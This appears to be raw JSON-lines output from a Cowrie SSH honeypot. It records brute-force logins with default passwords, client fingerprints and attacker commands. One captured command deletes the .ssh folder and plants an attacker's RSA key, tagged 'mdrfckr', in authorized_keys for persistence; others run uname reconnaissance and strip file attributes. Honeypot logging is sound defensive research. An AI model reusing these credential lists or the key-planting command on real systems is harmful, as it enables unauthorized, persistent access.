{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:13:30.004490Z","src_ip":"212.227.235.229","session":"3b44e86444e0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:13:30.213255Z","src_ip":"212.227.235.229","session":"1dad754efcf3"}
{"eventid":"cowrie.login.failed","username":"testserver","password":"testserver","message":"login attempt [testserver/testserver] failed","sensor":"my-vps","timestamp":"2025-08-31T06:13:30.843407Z","src_ip":"212.227.235.229","session":"3b44e86444e0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:13:31.470113Z","src_ip":"212.227.235.229","session":"1dad754efcf3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48726,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b05d80a8242","protocol":"ssh","message":"New connection: 212.227.235.229:48726 (1.2.3.4:22) [session: 5b05d80a8242]","sensor":"my-vps","timestamp":"2025-08-31T06:13:31.726438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:13:31.727999Z","src_ip":"212.227.235.229","session":"5b05d80a8242"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:13:31.986173Z","src_ip":"212.227.235.229","session":"5b05d80a8242"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:13:32.056804Z","src_ip":"212.227.235.229","session":"3b44e86444e0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:13:33.014617Z","src_ip":"212.227.235.229","session":"5b05d80a8242"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:13:33.273950Z","src_ip":"212.227.235.229","session":"5b05d80a8242"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:13:33.274806Z","src_ip":"212.227.235.229","session":"a52d66c1febd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:13:45.184015Z","src_ip":"212.227.235.229","session":"4d69be370e8b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:13:45.184793Z","src_ip":"212.227.235.229","session":"4d69be370e8b"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:13:50.113323Z","src_ip":"212.227.235.229","session":"d62fbcb89427"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37866,"dst_ip":"1.2.3.4","dst_port":22,"session":"e26ce1de69b4","protocol":"ssh","message":"New connection: 212.227.235.229:37866 (1.2.3.4:22) [session: e26ce1de69b4]","sensor":"my-vps","timestamp":"2025-08-31T06:13:52.213372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:13:52.956297Z","src_ip":"212.227.235.229","session":"e26ce1de69b4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:13:52.957253Z","src_ip":"212.227.235.229","session":"e26ce1de69b4"}
{"eventid":"cowrie.login.failed","username":"test4","password":"password1","message":"login attempt [test4/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T06:13:58.895570Z","src_ip":"212.227.235.229","session":"e26ce1de69b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:13:59.548206Z","src_ip":"212.227.125.160","session":"34cc318058c4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:13:59.549040Z","src_ip":"212.227.125.160","session":"34cc318058c4"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:00.702534Z","src_ip":"212.227.235.229","session":"e26ce1de69b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"7.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:07.318049Z","src_ip":"212.227.125.160","session":"34cc318058c4"}
{"eventid":"cowrie.session.closed","duration":"133.3","message":"Connection lost after 133.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:07.416533Z","src_ip":"212.227.125.160","session":"34cc318058c4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:14:09.596168Z","src_ip":"212.227.235.229","session":"d62fbcb89427"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:14:09.596925Z","src_ip":"212.227.235.229","session":"d62fbcb89427"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456A","message":"login attempt [root/a123456A] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:14:12.048858Z","src_ip":"212.227.235.229","session":"4d69be370e8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53272,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4be01ff660c","protocol":"ssh","message":"New connection: 212.227.235.229:53272 (1.2.3.4:22) [session: e4be01ff660c]","sensor":"my-vps","timestamp":"2025-08-31T06:14:12.325318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:14:12.326365Z","src_ip":"212.227.235.229","session":"e4be01ff660c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:14:12.594746Z","src_ip":"212.227.235.229","session":"e4be01ff660c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55786,"dst_ip":"1.2.3.4","dst_port":22,"session":"066d20424f9b","protocol":"ssh","message":"New connection: 212.227.125.160:55786 (1.2.3.4:22) [session: 066d20424f9b]","sensor":"my-vps","timestamp":"2025-08-31T06:14:12.733371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:14:13.207841Z","src_ip":"212.227.125.160","session":"066d20424f9b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:14:13.208668Z","src_ip":"212.227.125.160","session":"066d20424f9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46348,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea2abf20eaf4","protocol":"ssh","message":"New connection: 212.227.235.229:46348 (1.2.3.4:22) [session: ea2abf20eaf4]","sensor":"my-vps","timestamp":"2025-08-31T06:14:13.225037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:14:13.358769Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"4.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:13.679480Z","src_ip":"212.227.235.229","session":"d62fbcb89427"}
{"eventid":"cowrie.session.closed","duration":"118.1","message":"Connection lost after 118.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:13.702276Z","src_ip":"212.227.235.229","session":"d62fbcb89427"}
{"eventid":"cowrie.login.success","username":"root","password":"Pass@2024","message":"login attempt [root/Pass@2024] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:14:13.708366Z","src_ip":"212.227.235.229","session":"e4be01ff660c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:14:14.266985Z","src_ip":"212.227.235.229","session":"e4be01ff660c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:14:14.267766Z","src_ip":"212.227.235.229","session":"e4be01ff660c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:14:14.269194Z","src_ip":"212.227.235.229","session":"e4be01ff660c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:14:14.361166Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:14.539793Z","src_ip":"212.227.235.229","session":"e4be01ff660c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:14:15.137699Z","src_ip":"212.227.235.229","session":"e4be01ff660c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:14:15.138408Z","src_ip":"212.227.235.229","session":"e4be01ff660c"}
{"eventid":"cowrie.login.failed","username":"test4","password":"password1","message":"login attempt [test4/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T06:14:15.179353Z","src_ip":"212.227.125.160","session":"066d20424f9b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:14:15.409099Z","src_ip":"212.227.235.229","session":"e4be01ff660c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:15.409932Z","src_ip":"212.227.235.229","session":"e4be01ff660c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53286,"dst_ip":"1.2.3.4","dst_port":22,"session":"f572768e7933","protocol":"ssh","message":"New connection: 212.227.235.229:53286 (1.2.3.4:22) [session: f572768e7933]","sensor":"my-vps","timestamp":"2025-08-31T06:14:15.678061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:14:15.678779Z","src_ip":"212.227.235.229","session":"f572768e7933"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:14:15.947660Z","src_ip":"212.227.235.229","session":"f572768e7933"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:16.883330Z","src_ip":"212.227.125.160","session":"066d20424f9b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:14:17.065803Z","src_ip":"212.227.235.229","session":"f572768e7933"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:14:17.382454Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:14:17.859647Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
